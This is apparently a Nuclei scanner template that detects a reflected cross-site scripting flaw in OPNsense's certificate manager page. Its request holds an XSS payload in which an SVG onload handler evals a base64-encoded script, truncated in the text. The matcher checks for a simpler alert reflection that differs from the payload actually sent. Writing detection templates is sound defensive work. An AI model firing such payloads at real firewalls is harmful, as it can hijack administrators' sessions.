id: opnsense-xss
info:
  name: OPNsense - Cross Site Scripting
  author: Herry
  severity: medium
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
  tags: opnsense,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/system_certmanager.php?act=%22%3E%3Csvg/onload=eval(atob(%27bGV0IHJlcXVlc3REYXRh[...]HsKCQl9KQoJfSkKfSwgMTAwMCk=%27))%3E&id=0"

    matchers:
      - type: word
        part: body
        words:
          - 'id="action" value=""><svg/onload=alert(window.origin)>"/>'